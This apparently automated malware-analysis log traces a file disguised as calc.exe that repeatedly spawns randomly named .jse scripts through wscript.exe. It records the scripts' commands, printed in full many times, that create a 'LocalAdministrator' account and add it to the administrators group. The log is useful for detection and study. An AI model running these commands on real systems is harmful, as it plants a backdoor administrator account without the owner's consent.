Source: calc.exe | String found in binary or memory: IWshShell3.Run("wscript.exe VAJOf7ymJQ.jse", "1", "false");IWshShell3.Run("wscript.exe R7pPYI1mUq.jse", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("wscript.exe KobIITTimt.jse", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("wscript.exe BKnQ77VBHl.jse", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse | |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
